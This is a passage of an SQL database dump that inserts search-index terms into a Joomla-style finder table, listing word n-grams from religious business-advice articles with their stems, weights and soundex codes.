(239414, 'the future of', 'the future of', 0, 1, 1.4333, 'T1361', 1, '*'),
(239415, 'the future that', 'the future that', 0, 1, 1.5, 'T1363', 1, '*'),
(239416, 'the house of', 'the house of', 0, 1, 1.4, 'T210', 1, '*'),
(239417, 'the house so', 'the house so', 0, 1, 1.4, 'T200', 1, '*'),
(239418, 'the increase', 'the increase', 0, 1, 1.4, 'T5262', 1, '*'),
(239419, 'the increase of', 'the increase of', 0, 1, 1.5, 'T52621', 1, '*'),
(239420, 'the kingdom way', 'the kingdom way', 0, 1, 1.5, 'T25235', 1, '*'),
(239421, 'the level of', 'the level of', 0, 1, 1.4, 'T4141', 4, '*'),
(239422, 'the lord don\'t', 'the lord don', 0, 1, 1.4667, 'T46353', 1, '*'),
(239423, 'the lord wants', 'the lord wants', 0, 1, 1.4667, 'T463532', 1, '*'),
(239424, 'the lord with', 'the lord with', 0, 1, 1.4333, 'T463', 1, '*'),
(239425, 'the man of', 'the man of', 0, 1, 1.3333, 'T510', 3, '*'),
(239426, 'the money is', 'the money is', 0, 1, 1.4, 'T520', 1, '*'),
(239427, 'the more importantly', 'the more importantly', 0, 1, 1.6667, 'T565163534', 1, '*'),
(239428, 'the owner', 'the owner', 0, 1, 1.3, 'T560', 1, '*'),
(239429, 'the owner who', 'the owner who', 0, 1, 1.4333, 'T560', 1, '*'),
(239430, 'the scope', 'the scope', 0, 1, 1.3, 'T210', 1, '*'),
(239431, 'the scope and', 'the scope and', 0, 1, 1.4333, 'T2153', 1, '*'),
(239432, 'the scope of', 'the scope of', 0, 1, 1.4, 'T210', 1, '*'),
(239433, 'the scriptural', 'the scriptural', 0, 1, 1.4667, 'T261364', 1, '*'),
(239434, 'the scriptural ground', 'the scriptural ground', 0, 1, 1.7, 'T2613642653', 1, '*'),
(239435, 'the staff', 'the staff', 0, 1, 1.3, 'T231', 1, '*'),
(239436, 'the staff put', 'the staff put', 0, 1, 1.4333, 'T2313', 1, '*'),
(239437, 'the steps to', 'the steps to', 0, 1, 1.4, 'T23123', 2, '*'),
(239438, 'the things you', 'the things you', 0, 1, 1.4667, 'T520', 1, '*'),
(239439, 'the vision', 'the vision', 0, 1, 1.3333, 'T125', 1, '*'),
(239440, 'the vision and', 'the vision and', 0, 1, 1.4667, 'T1253', 1, '*'),
(239441, 'the vision by', 'the vision by', 0, 1, 1.4333, 'T1251', 1, '*'),
(239442, 'the vision partnering', 'the vision partnering', 0, 1, 1.7, 'T1251635652', 1, '*'),
(239443, 'the vision to', 'the vision to', 0, 1, 1.4333, 'T1253', 1, '*'),
(239444, 'the wider', 'the wider', 0, 1, 1.3, 'T600', 1, '*'),
(239445, 'the wider the', 'the wider the', 0, 1, 1.4333, 'T630', 1, '*'),
(239446, 'then always', 'then always', 0, 1, 1.3667, 'T542', 1, '*'),
(239447, 'then always honor', 'then always honor', 0, 1, 1.5667, 'T54256', 1, '*'),
(239448, 'there is also', 'there is also', 0, 1, 1.4333, 'T6242', 1, '*'),
(239449, 'these are the', 'these are the', 0, 1, 1.4333, 'T263', 1, '*'),
(239450, 'they will lend', 'thei will lend', 0, 1, 1.4667, 'T453', 1, '*'),
(239451, 'things a', 'thing a', 0, 1, 1.2667, 'T520', 1, '*'),
(239452, 'things a it', 'thing a it', 0, 1, 1.3667, 'T523', 1, '*'),
(239453, 'things you can', 'thing you can', 0, 1, 1.4667, 'T525', 1, '*'),
(239454, 'think and', 'think and', 0, 1, 1.3, 'T5253', 1, '*'),
(239455, 'think and function', 'think and function', 0, 1, 1.6, 'T525315235', 1, '*'),
(239456, 'think big', 'think big', 0, 1, 1.3, 'T5212', 1, '*'),
(239457, 'think big think', 'think big think', 0, 1, 1.5, 'T5212352', 1, '*'),
(239458, 'think grand', 'think grand', 0, 1, 1.3667, 'T52653', 1, '*'),
(239459, 'think grand think', 'think grand think', 0, 1, 1.5667, 'T5265352', 1, '*'),
(239460, 'this is crucial', 'thi is crucial', 0, 1, 1.5, 'T2624', 1, '*'),
(239461, 'this level', 'thi level', 0, 1, 1.3333, 'T2414', 1, '*'),
(239462, 'this level of', 'thi level of', 0, 1, 1.4333, 'T24141', 1, '*'),
(239463, 'thoroughly', 'thoroughli', 0, 0, 0.6667, 'T624', 1, '*'),
(239464, 'thoroughly prepared', 'thoroughli prepared', 0, 1, 1.6333, 'T62416163', 1, '*'),
(239465, 'thoroughly prepared for', 'thoroughli prepared for', 0, 1, 1.7667, 'T6241616316', 1, '*'),
(239466, 'three things a', 'three things a', 0, 1, 1.4667, 'T6352', 1, '*'),
(239467, 'three things that', 'three things that', 0, 1, 1.5667, 'T63523', 1, '*'),
(239468, 'through multiple', 'through multiple', 0, 1, 1.5333, 'T6254314', 1, '*'),
(239469, 'through multiple streams', 'through multiple streams', 0, 1, 1.8, 'T625431423652', 1, '*'),
(239470, 'thus', 'thu', 0, 0, 0.2667, 'T200', 1, '*'),
(239471, 'thus make', 'thu make', 0, 1, 1.3, 'T252', 1, '*'),
(239472, 'thus make room', 'thu make room', 0, 1, 1.4667, 'T25265', 1, '*'),
(239473, 'tithe', 'tith', 0, 0, 0.3333, 'T000', 2, '*'),
(239474, 'tithe regularly', 'tith regularly', 0, 1, 1.5, 'T62464', 1, '*'),
(239475, 'tithe regularly and', 'tith regularly and', 0, 1, 1.6333, 'T6246453', 1, '*'),
(239476, 'tither', 'tither', 0, 0, 0.4, 'T600', 1, '*'),
(239477, 'tither pay', 'tither pay', 0, 1, 1.3333, 'T610', 1, '*'),
(239478, 'tither pay your', 'tither pay your', 0, 1, 1.5, 'T616', 1, '*'),
(239479, 'tither you', 'tither you', 0, 1, 1.3333, 'T600', 1, '*'),
(239480, 'tither you activate', 'tither you activate', 0, 1, 1.6333, 'T62313', 1, '*'),
(239481, 'to a ripple', 'to a ripple', 0, 1, 1.3667, 'T614', 1, '*'),
(239482, 'to be more', 'to be more', 0, 1, 1.3333, 'T156', 1, '*'),
(239483, 'to command', 'to command', 0, 1, 1.3333, 'T253', 1, '*'),
(239484, 'to command always', 'to command always', 0, 1, 1.5667, 'T25342', 1, '*'),
(239485, 'to do business', 'to do business', 0, 1, 1.4667, 'T1252', 1, '*'),
(239486, 'to engage', 'to engage', 0, 1, 1.3, 'T520', 1, '*'),
(239487, 'to engage in', 'to engage in', 0, 1, 1.4, 'T525', 1, '*'),
(239488, 'to enjoy outcomes', 'to enjoy outcomes', 0, 1, 1.5667, 'T523252', 1, '*'),
(239489, 'to find out', 'to find out', 0, 1, 1.3667, 'T153', 1, '*'),
(239490, 'to joke', 'to joke', 0, 1, 1.2333, 'T200', 1, '*'),
(239491, 'to joke and', 'to joke and', 0, 1, 1.3667, 'T253', 1, '*'),
(239492, 'to make more', 'to make more', 0, 1, 1.4, 'T5256', 1, '*'),
(239493, 'to many', 'to many', 0, 1, 1.2333, 'T500', 1, '*'),
(239494, 'to many nations', 'to many nations', 0, 1, 1.5, 'T5352', 1, '*'),
(239495, 'to occultic', 'to occultic', 0, 1, 1.3667, 'T2432', 1, '*'),
(239496, 'to occultic attack', 'to occultic attack', 0, 1, 1.6, 'T243232', 1, '*'),
(239497, 'to operate it', 'to operate it', 0, 1, 1.4333, 'T163', 1, '*'),
(239498, 'to partner', 'to partner', 0, 1, 1.3333, 'T16356', 1, '*'),
(239499, 'to partner with', 'to partner with', 0, 1, 1.5, 'T163563', 1, '*'),
(239500, 'to run', 'to run', 0, 1, 1.2, 'T650', 1, '*'),
(239501, 'to run your', 'to run your', 0, 1, 1.3667, 'T656', 1, '*'),
(239502, 'to start a', 'to start a', 0, 1, 1.3333, 'T2363', 1, '*'),
(239503, 'to start and', 'to start and', 0, 1, 1.4, 'T236353', 1, '*'),
(239504, 'to start putting', 'to start putting', 0, 1, 1.5333, 'T23631352', 1, '*'),
(239505, 'to take also', 'to take also', 0, 1, 1.4, 'T242', 1, '*'),
(239506, 'to the abundance', 'to the abundance', 0, 1, 1.5333, 'T15352', 1, '*'),
(239507, 'to the expanse', 'to the expanse', 0, 1, 1.4667, 'T2152', 1, '*'),
(239508, 'to the future', 'to the future', 0, 1, 1.4333, 'T136', 1, '*'),
(239509, 'to these', 'to these', 0, 1, 1.2667, 'T200', 1, '*'),
(239510, 'to these are', 'to these are', 0, 1, 1.4, 'T260', 1, '*'),
(239511, 'to your heart', 'to your heart', 0, 1, 1.4333, 'T630', 1, '*'),
(239512, 'to your wealthy', 'to your wealthy', 0, 1, 1.5, 'T643', 1, '*'),
(239513, 'training in god', 'train in god', 0, 1, 1.5, 'T652523', 1, '*'),
(239514, 'transparent', 'transpar', 0, 0, 0.7333, 'T6521653', 1, '*'),
(239515, 'transparent nylon', 'transpar nylon', 0, 1, 1.5667, 'T6521653545', 1, '*'),
(239516, 'transparent nylon and', 'transpar nylon and', 0, 1, 1.7, 'T65216535453', 1, '*'),
(239517, 'transport', 'transport', 0, 0, 0.6, 'T652163', 1, '*'),
(239518, 'transport company', 'transport company', 0, 1, 1.5667, 'T6521632515', 1, '*'),
(239519, 'transport company and', 'transport company and', 0, 1, 1.7, 'T65216325153', 1, '*'),
(239520, 'trial', 'trial', 0, 0, 0.3333, 'T640', 1, '*'),
(239521, 'trial and', 'trial and', 0, 1, 1.3, 'T6453', 1, '*'),
(239522, 'trial and error', 'trial and error', 0, 1, 1.5, 'T64536', 1, '*'),
(239523, 'understanding of a', 'understand of a', 0, 1, 1.6, 'U5362353521', 1, '*'),
(239524, 'up to occultic', 'up to occultic', 0, 1, 1.4667, 'U132432', 1, '*'),
(239525, 'up your business', 'up your business', 0, 1, 1.5333, 'U161252', 1, '*'),
(239526, 'upon don\'t', 'upon don', 0, 1, 1.3333, 'U15353', 1, '*'),
(239527, 'upon don\'t pick', 'upon don pick', 0, 1, 1.5, 'U1535312', 1, '*'),
(239528, 'upon the lord', 'upon the lord', 0, 1, 1.4333, 'U153463', 1, '*'),
(239529, 'upon your life', 'upon your life', 0, 1, 1.4667, 'U15641', 2, '*'),
(239530, 'us consider', 'us consider', 0, 1, 1.3667, 'U25236', 1, '*'),
(239531, 'us consider the', 'us consider the', 0, 1, 1.5, 'U252363', 1, '*'),
(239532, 'vigilant', 'vigil', 0, 0, 0.5333, 'V2453', 1, '*'),
(239533, 'vigilant do', 'vigil do', 0, 1, 1.3667, 'V2453', 1, '*'),
(239534, 'vigilant do not', 'vigil do not', 0, 1, 1.5, 'V245353', 1, '*'),
(239535, 'vision', 'vision', 0, 0, 0.4, 'V250', 1, '*'),
(239536, 'vision and', 'vision and', 0, 1, 1.3333, 'V253', 1, '*'),
(239537, 'vision and the', 'vision and the', 0, 1, 1.4667, 'V253', 1, '*'),
(239538, 'vision by', 'vision by', 0, 1, 1.3, 'V251', 1, '*'),
(239539, 'vision by so', 'vision by so', 0, 1, 1.4, 'V2512', 1, '*'),
(239540, 'vision partnering', 'vision partnering', 0, 1, 1.5667, 'V251635652', 1, '*'),
(239541, 'vision partnering with', 'vision partnering with', 0, 1, 1.7333, 'V2516356523', 1, '*'),
(239542, 'vision to', 'vision to', 0, 1, 1.3, 'V253', 1, '*'),
(239543, 'vision to command', 'vision to command', 0, 1, 1.5667, 'V253253', 1, '*'),
(239544, 'wait upon', 'wait upon', 0, 1, 1.3, 'W315', 1, '*'),
(239545, 'wait upon the', 'wait upon the', 0, 1, 1.4333, 'W3153', 1, '*'),
(239546, 'watchful', 'watch', 0, 0, 0.5333, 'W3214', 1, '*'),
(239547, 'watchful don\'t', 'watch don', 0, 1, 1.4667, 'W3214353', 1, '*'),
(239548, 'watchful don\'t let', 'watch don let', 0, 1, 1.6, 'W321435343', 1, '*'),
(239549, 'way to do', 'wai to do', 0, 1, 1.3, 'W300', 1, '*'),
(239550, 'way to start', 'wai to start', 0, 1, 1.4, 'W32363', 1, '*'),
(239551, 'way with', 'wai with', 0, 1, 1.2667, 'W300', 1, '*'),
(239552, 'way with kingdom', 'wai with kingdom', 0, 1, 1.5333, 'W325235', 1, '*'),
(239553, 'wealthy', 'wealthi', 0, 0, 0.4667, 'W430', 2, '*'),
(239554, 'wealthy place', 'wealthi place', 0, 1, 1.4333, 'W43142', 1, '*'),
(239555, 'wealthy place a', 'wealthi place a', 0, 1, 1.5, 'W43142', 1, '*'),
(239556, 'well it\'s', 'well it', 0, 1, 1.3, 'W432', 1, '*'),
(239557, 'well it\'s going', 'well it going', 0, 1, 1.5, 'W43252', 1, '*'),
(239558, 'well let', 'well let', 0, 1, 1.2667, 'W430', 1, '*'),
(239559, 'well let your', 'well let your', 0, 1, 1.4333, 'W436', 1, '*'),
(239560, 'what are the', 'what are the', 0, 1, 1.4, 'W363', 1, '*'),
(239561, 'what business', 'what business', 0, 1, 1.4333, 'W31252', 1, '*'),
(239562, 'what business the', 'what business the', 0, 1, 1.5667, 'W312523', 1, '*'),
(239563, 'what everybody', 'what everybody', 0, 1, 1.4667, 'W31613', 1, '*'),
(239564, 'what everybody is', 'what everybody is', 0, 1, 1.5667, 'W316132', 1, '*'),
(239565, 'what will last', 'what will last', 0, 1, 1.4667, 'W3423', 1, '*'),
(239566, 'what your business', 'what your business', 0, 1, 1.6, 'W361252', 1, '*'),
(239567, 'when you sow', 'when you sow', 0, 1, 1.4, 'W520', 1, '*'),
(239568, 'who draws', 'who draws', 0, 1, 1.3, 'W362', 1, '*'),
(239569, 'who draws the', 'who draws the', 0, 1, 1.4333, 'W3623', 1, '*'),
(239570, 'who knows the', 'who knows the', 0, 1, 1.4333, 'W2523', 1, '*'),
(239571, 'wholesales', 'wholesal', 0, 0, 0.6667, 'W4242', 1, '*'),
(239572, 'wholesales supply', 'wholesal supply', 0, 1, 1.5667, 'W424214', 1, '*'),
(239573, 'wholesales supply of', 'wholesal supply of', 0, 1, 1.6667, 'W4242141', 1, '*'),
(239574, 'wider', 'wider', 0, 0, 0.3333, 'W360', 1, '*'),
(239575, 'wider the', 'wider the', 0, 1, 1.3, 'W363', 1, '*'),
(239576, 'wider the scope', 'wider the scope', 0, 1, 1.5, 'W36321', 1, '*'),
(239577, 'wider you', 'wider you', 0, 1, 1.3, 'W360', 1, '*'),
(239578, 'wider you need', 'wider you need', 0, 1, 1.4667, 'W3653', 1, '*'),
(239579, 'will always draw', 'will always draw', 0, 1, 1.5333, 'W4236', 1, '*'),
(239580, 'will always secure', 'will always secure', 0, 1, 1.6, 'W426', 1, '*'),
(239581, 'will be blessed', 'will be blessed', 0, 1, 1.5, 'W41423', 1, '*'),
(239582, 'will be employers', 'will be employers', 0, 1, 1.5667, 'W4151462', 1, '*'),
(239583, 'will be the', 'will be the', 0, 1, 1.3667, 'W413', 2, '*'),
(239584, 'will connect you', 'will connect you', 0, 1, 1.5333, 'W42523', 1, '*'),
(239585, 'will connect your', 'will connect your', 0, 1, 1.5667, 'W425236', 1, '*'),
(239586, 'will do three', 'will do three', 0, 1, 1.4333, 'W436', 1, '*'),
(239587, 'will ensure', 'will ensure', 0, 1, 1.3667, 'W4526', 1, '*'),
(239588, 'will ensure continuity', 'will ensure continuity', 0, 1, 1.7333, 'W452625353', 1, '*'),
(239589, 'will flow effortlessly', 'will flow effortlessly', 0, 1, 1.7333, 'W414163424', 1, '*'),
(239590, 'will last must', 'will last must', 0, 1, 1.4667, 'W423523', 1, '*'),
(239591, 'will lead', 'will lead', 0, 1, 1.3, 'W430', 1, '*'),
(239592, 'will lead you', 'will lead you', 0, 1, 1.4333, 'W430', 1, '*'),
(239593, 'will legitimize', 'will legitimize', 0, 1, 1.5, 'W42352', 1, '*'),
(239594, 'will legitimize your', 'will legitimize your', 0, 1, 1.6667, 'W423526', 1, '*'),
(239595, 'will lend', 'will lend', 0, 1, 1.3, 'W453', 1, '*'),
(239596, 'will lend to', 'will lend to', 0, 1, 1.4, 'W453', 1, '*'),
(239597, 'will make you', 'will make you', 0, 1, 1.4333, 'W452', 1, '*'),
(239598, 'will not get', 'will not get', 0, 1, 1.4, 'W45323', 1, '*'),
(239599, 'with a', 'with a', 0, 1, 1.2, 'W300', 3, '*'),
(239600, 'with a proper', 'with a proper', 0, 1, 1.4333, 'W31616', 1, '*'),
(239601, 'with god over', 'with god over', 0, 1, 1.4333, 'W32316', 1, '*'),
(239602, 'with kingdom', 'with kingdom', 0, 1, 1.4, 'W325235', 1, '*'),
(239603, 'with kingdom principles', 'with kingdom principles', 0, 1, 1.7667, 'W3252351652142', 1, '*'),
(239604, 'with multiple', 'with multiple', 0, 1, 1.4333, 'W354314', 1, '*'),
(239605, 'with multiple streams', 'with multiple streams', 0, 1, 1.7, 'W35431423652', 1, '*'),
(239606, 'with spiritual', 'with spiritual', 0, 1, 1.4667, 'W321634', 1, '*'),
(239607, 'with spiritual preparation', 'with spiritual preparation', 0, 1, 1.8667, 'W321634161635', 1, '*'),
(239608, 'with the anointing', 'with the anointing', 0, 1, 1.6, 'W35352', 1, '*'),
(239609, 'with the first', 'with the first', 0, 1, 1.4667, 'W31623', 1, '*'),
(239610, 'with the vision', 'with the vision', 0, 1, 1.5, 'W3125', 1, '*'),
(239611, 'with your first', 'with your first', 0, 1, 1.5, 'W361623', 1, '*'),
(239612, 'word from', 'word from', 0, 1, 1.3, 'W63165', 1, '*'),
(239613, 'word from the', 'word from the', 0, 1, 1.4333, 'W631653', 1, '*'),
(239614, 'working a', 'work a', 0, 1, 1.3, 'W6252', 1, '*'),
(239615, 'working a divine', 'work a divine', 0, 1, 1.5333, 'W6252315', 1, '*'),
(239616, 'workout', 'workout', 0, 0, 0.4667, 'W623', 1, '*'),
(239617, 'workout the', 'workout the', 0, 1, 1.3667, 'W623', 1, '*'),
(239618, 'workout the details', 'workout the details', 0, 1, 1.6333, 'W62342', 1, '*'),
(239619, 'you 1', 'you 1', 0, 1, 1.1667, 'Y000', 1, '*'),
(239620, 'you 1 divine', 'you 1 divine', 0, 1, 1.4, 'Y315', 1, '*'),
(239621, 'you a business', 'you a business', 0, 1, 1.4667, 'Y1252', 1, '*'),
(239622, 'you a direction', 'you a direction', 0, 1, 1.5, 'Y36235', 1, '*'),
(239623, 'you activate', 'you activate', 0, 1, 1.4, 'Y2313', 1, '*'),
(239624, 'you activate the', 'you activate the', 0, 1, 1.5333, 'Y2313', 1, '*'),
(239625, 'you always', 'you always', 0, 1, 1.3333, 'Y420', 1, '*'),
(239626, 'you always set', 'you always set', 0, 1, 1.4667, 'Y423', 1, '*'),
(239627, 'you an idea', 'you an idea', 0, 1, 1.3667, 'Y530', 1, '*'),
(239628, 'you are executing', 'you are executing', 0, 1, 1.5667, 'Y62352', 1, '*'),
(239629, 'you are standing', 'you are standing', 0, 1, 1.5333, 'Y6235352', 1, '*'),
(239630, 'you are working', 'you are working', 0, 1, 1.5, 'Y6252', 1, '*'),
(239631, 'you away', 'you away', 0, 1, 1.2667, 'Y000', 1, '*'),
(239632, 'you away from', 'you away from', 0, 1, 1.4333, 'Y165', 1, '*'),
(239633, 'you can\'t plan', 'you can plan', 0, 1, 1.4667, 'Y253145', 1, '*'),
(239634, 'you connect', 'you connect', 0, 1, 1.3667, 'Y2523', 1, '*'),
(239635, 'you connect to', 'you connect to', 0, 1, 1.4667, 'Y2523', 1, '*'),
(239636, 'you engage the', 'you engage the', 0, 1, 1.4667, 'Y523', 1, '*'),
(239637, 'you have drawn', 'you have drawn', 0, 1, 1.4667, 'Y1365', 1, '*'),
(239638, 'you open', 'you open', 0, 1, 1.2667, 'Y150', 1, '*'),
(239639, 'you open yourself', 'you open yourself', 0, 1, 1.5667, 'Y156241', 1, '*'),
(239640, 'you should begin', 'you should begin', 0, 1, 1.5333, 'Y243125', 1, '*'),
(239641, 'you should find', 'you should find', 0, 1, 1.5, 'Y243153', 1, '*'),
(239642, 'you should start', 'you should start', 0, 1, 1.5333, 'Y2432363', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(239643, 'you sow', 'you sow', 0, 1, 1.2333, 'Y200', 1, '*'),
(239644, 'you sow commensurate', 'you sow commensurate', 0, 1, 1.6667, 'Y25263', 1, '*'),
(239645, 'you sow give', 'you sow give', 0, 1, 1.4, 'Y210', 1, '*'),
(239646, 'you sow your', 'you sow your', 0, 1, 1.4, 'Y260', 1, '*'),
(239647, 'you start is', 'you start is', 0, 1, 1.4, 'Y23632', 1, '*'),
(239648, 'you start telling', 'you start telling', 0, 1, 1.5667, 'Y2363452', 1, '*'),
(239649, 'you take your', 'you take your', 0, 1, 1.4333, 'Y326', 1, '*'),
(239650, 'you the name', 'you the name', 0, 1, 1.4, 'Y350', 1, '*'),
(239651, 'you to engage', 'you to engage', 0, 1, 1.4333, 'Y352', 1, '*'),
(239652, 'you to operate', 'you to operate', 0, 1, 1.4667, 'Y3163', 1, '*'),
(239653, 'you to start', 'you to start', 0, 1, 1.4, 'Y32363', 1, '*'),
(239654, 'you to your', 'you to your', 0, 1, 1.3667, 'Y360', 1, '*'),
(239655, 'your affairs', 'your affairs', 0, 1, 1.4, 'Y6162', 1, '*'),
(239656, 'your affairs 4', 'your affairs 4', 0, 1, 1.4667, 'Y6162', 1, '*'),
(239657, 'your business', 'your business', 0, 1, 1.4333, 'Y61252', 1, '*'),
(239658, 'your business 9', 'your business 9', 0, 1, 1.5, 'Y61252', 1, '*'),
(239659, 'your business and', 'your business and', 0, 1, 1.5667, 'Y6125253', 1, '*'),
(239660, 'your business be', 'your business be', 0, 1, 1.5333, 'Y612521', 1, '*'),
(239661, 'your business because', 'your business because', 0, 1, 1.7, 'Y6125212', 1, '*'),
(239662, 'your business by', 'your business by', 0, 1, 1.5333, 'Y612521', 1, '*'),
(239663, 'your business can', 'your business can', 0, 1, 1.5667, 'Y612525', 1, '*'),
(239664, 'your business don\'t', 'your business don', 0, 1, 1.6333, 'Y61252353', 1, '*'),
(239665, 'your business in', 'your business in', 0, 1, 1.5333, 'Y612525', 1, '*'),
(239666, 'your business let', 'your business let', 0, 1, 1.5667, 'Y6125243', 1, '*'),
(239667, 'your business make', 'your business make', 0, 1, 1.6, 'Y6125252', 1, '*'),
(239668, 'your business name', 'your business name', 0, 1, 1.6, 'Y612525', 1, '*'),
(239669, 'your business partner', 'your business partner', 0, 1, 1.7, 'Y6125216356', 1, '*'),
(239670, 'your business separate', 'your business separate', 0, 1, 1.7333, 'Y61252163', 1, '*'),
(239671, 'your business the', 'your business the', 0, 1, 1.5667, 'Y612523', 1, '*'),
(239672, 'your business to', 'your business to', 0, 1, 1.5333, 'Y612523', 1, '*'),
(239673, 'your business with', 'your business with', 0, 1, 1.6, 'Y612523', 1, '*'),
(239674, 'your business your', 'your business your', 0, 1, 1.6, 'Y612526', 1, '*'),
(239675, 'your customers', 'your customers', 0, 1, 1.4667, 'Y623562', 1, '*'),
(239676, 'your customers 11', 'your customers 11', 0, 1, 1.5667, 'Y623562', 1, '*'),
(239677, 'your employees', 'your employees', 0, 1, 1.4667, 'Y65142', 1, '*'),
(239678, 'your employees and', 'your employees and', 0, 1, 1.6, 'Y6514253', 1, '*'),
(239679, 'your environment', 'your environment', 0, 1, 1.5333, 'Y651653', 1, '*'),
(239680, 'your environment rather', 'your environment rather', 0, 1, 1.7667, 'Y651653636', 1, '*'),
(239681, 'your first fruit', 'your first fruit', 0, 1, 1.5333, 'Y61623163', 1, '*'),
(239682, 'your heart on', 'your heart on', 0, 1, 1.4333, 'Y635', 1, '*'),
(239683, 'your income', 'your income', 0, 1, 1.3667, 'Y6525', 1, '*'),
(239684, 'your income and', 'your income and', 0, 1, 1.5, 'Y65253', 1, '*'),
(239685, 'your income as', 'your income as', 0, 1, 1.4667, 'Y65252', 1, '*'),
(239686, 'your income that', 'your income that', 0, 1, 1.5333, 'Y65253', 1, '*'),
(239687, 'your life there', 'your life there', 0, 1, 1.5, 'Y64136', 1, '*'),
(239688, 'your life through', 'your life through', 0, 1, 1.5667, 'Y641362', 1, '*'),
(239689, 'your own 10', 'your own 10', 0, 1, 1.3667, 'Y650', 1, '*'),
(239690, 'your place in', 'your place in', 0, 1, 1.4333, 'Y61425', 1, '*'),
(239691, 'your preparation', 'your preparation', 0, 1, 1.5333, 'Y6161635', 1, '*'),
(239692, 'your preparation be', 'your preparation be', 0, 1, 1.6333, 'Y61616351', 1, '*'),
(239693, 'your sake', 'your sake', 0, 1, 1.3, 'Y620', 1, '*'),
(239694, 'your sake nothing', 'your sake nothing', 0, 1, 1.5667, 'Y625352', 1, '*'),
(239695, 'your seed', 'your seed', 0, 1, 1.3, 'Y623', 1, '*'),
(239696, 'your seed will', 'your seed will', 0, 1, 1.4667, 'Y6234', 1, '*'),
(239697, 'your seed you', 'your seed you', 0, 1, 1.4333, 'Y623', 1, '*'),
(239698, 'your starting', 'your starting', 0, 1, 1.4333, 'Y6236352', 1, '*'),
(239699, 'your starting seed', 'your starting seed', 0, 1, 1.6, 'Y62363523', 1, '*'),
(239700, 'your tithe', 'your tithe', 0, 1, 1.3333, 'Y630', 1, '*'),
(239701, 'your tithe regularly', 'your tithe regularly', 0, 1, 1.6667, 'Y6362464', 1, '*'),
(239702, 'your wealthy', 'your wealthy', 0, 1, 1.4, 'Y643', 1, '*'),
(239703, 'your wealthy place', 'your wealthy place', 0, 1, 1.6, 'Y643142', 1, '*'),
(239704, 'yourself from that', 'yourself from that', 0, 1, 1.6, 'Y6241653', 1, '*'),
(239705, 'yourself in the', 'yourself in the', 0, 1, 1.5, 'Y624153', 1, '*'),
(239706, 'yourself on a', 'yourself on a', 0, 1, 1.4333, 'Y62415', 1, '*'),
(239707, 'yourself up', 'yourself up', 0, 1, 1.3667, 'Y6241', 1, '*'),
(239708, 'yourself up to', 'yourself up to', 0, 1, 1.4667, 'Y62413', 1, '*'),
(240142, '9 9', '9 9', 0, 1, 1.1, '', 2, '*'),
(240152, 'a man\'s', 'a man', 0, 1, 1.2333, 'A520', 2, '*'),
(240281, 'corrects', 'correct', 0, 0, 0.5333, 'C6232', 3, '*'),
(240282, 'corrects you', 'correct you', 0, 1, 1.4, 'C6232', 3, '*'),
(240305, 'do and', 'do and', 0, 1, 1.2, 'D530', 3, '*'),
(240328, 'even in', 'even in', 0, 1, 1.2333, 'E150', 3, '*'),
(240334, 'fact', 'fact', 0, 0, 0.2667, 'F230', 2, '*'),
(240422, 'if there', 'if there', 0, 1, 1.2667, 'I136', 3, '*'),
(240423, 'if there is', 'if there is', 0, 1, 1.3667, 'I1362', 3, '*'),
(240465, 'it for', 'it for', 0, 1, 1.2, 'I316', 2, '*'),
(240531, 'man\'s', 'man', 0, 0, 0.3333, 'M200', 2, '*'),
(240595, 'pray in the', 'prai in the', 0, 1, 1.3667, 'P653', 2, '*'),
(240702, 'those activities', 'those activities', 0, 1, 1.5333, 'T23132', 2, '*'),
(243504, 'inside you', 'insid you', 0, 1, 1.3333, 'I523', 2, '*'),
(247324, 'about to', 'about to', 0, 1, 1.2667, 'A130', 4, '*'),
(247403, 'before it', 'befor it', 0, 1, 1.3, 'B630', 2, '*'),
(247404, 'before it is', 'befor it is', 0, 1, 1.4, 'B632', 2, '*'),
(247609, 'is about to', 'is about to', 0, 1, 1.3667, 'I213', 3, '*'),
(247618, 'is too', 'is too', 0, 1, 1.2, 'I230', 2, '*'),
(247619, 'is too late', 'is too late', 0, 1, 1.3667, 'I2343', 2, '*'),
(247627, 'it is too', 'it is too', 0, 1, 1.3, 'I323', 2, '*'),
(247775, 'out of the', 'out of the', 0, 1, 1.3333, 'O313', 4, '*'),
(247796, 'problems or', 'problem or', 0, 1, 1.3667, 'P614526', 3, '*'),
(247990, 'whenever you', 'whenev you', 0, 1, 1.4, 'W516', 2, '*'),
(249441, 'can\'t take', 'can take', 0, 1, 1.3333, 'C532', 3, '*'),
(249476, 'divine call', 'divin call', 0, 1, 1.3667, 'D1524', 3, '*'),
(249568, 'has nothing', 'ha nothing', 0, 1, 1.3667, 'H25352', 3, '*'),
(249604, 'i had', 'i had', 0, 1, 1.1667, 'I300', 3, '*'),
(249618, 'if i', 'if i', 0, 1, 1.1333, 'I100', 3, '*'),
(249744, 'purpose and', 'purpos and', 0, 1, 1.3667, 'P61253', 2, '*'),
(249747, 'purpose god', 'purpos god', 0, 1, 1.3667, 'P6123', 2, '*'),
(249767, 'release', 'releas', 0, 0, 0.4667, 'R420', 3, '*'),
(249784, 'secondary', 'secondari', 0, 0, 0.6, 'S536', 2, '*'),
(249825, 'the call', 'the call', 0, 1, 1.2667, 'T240', 3, '*'),
(249920, 'you can\'t take', 'you can take', 0, 1, 1.4667, 'Y2532', 3, '*'),
(250352, '05 2017', '05 2017', 0, 1, 1.2333, '', 5, '*'),
(250353, '1 the name', '1 the name', 0, 1, 1.3333, 'T500', 2, '*'),
(250354, '2 the name', '2 the name', 0, 1, 1.3333, 'T500', 2, '*'),
(250357, '7 05', '7 05', 0, 1, 1.1333, '', 2, '*'),
(250358, '7 05 2017', '7 05 2017', 0, 1, 1.3, '', 2, '*'),
(250359, 'a divine call', 'a divine call', 0, 1, 1.4333, 'A31524', 2, '*'),
(250360, 'a man bears', 'a man bears', 0, 1, 1.3667, 'A5162', 2, '*'),
(250361, 'accordance with', 'accord with', 0, 1, 1.5, 'A263523', 2, '*'),
(250362, 'accordance with the', 'accord with the', 0, 1, 1.6333, 'A263523', 2, '*'),
(250363, 'account for', 'account for', 0, 1, 1.3667, 'A25316', 2, '*'),
(250364, 'account for when', 'account for when', 0, 1, 1.5333, 'A253165', 2, '*'),
(250365, 'active operation', 'activ operation', 0, 1, 1.5333, 'A231635', 2, '*'),
(250366, 'active operation in', 'activ operation in', 0, 1, 1.6333, 'A231635', 2, '*'),
(250367, 'and calling therefore', 'and calling therefore', 0, 1, 1.7, 'A5324523616', 2, '*'),
(250368, 'and fulfill', 'and fulfill', 0, 1, 1.3667, 'A531414', 2, '*'),
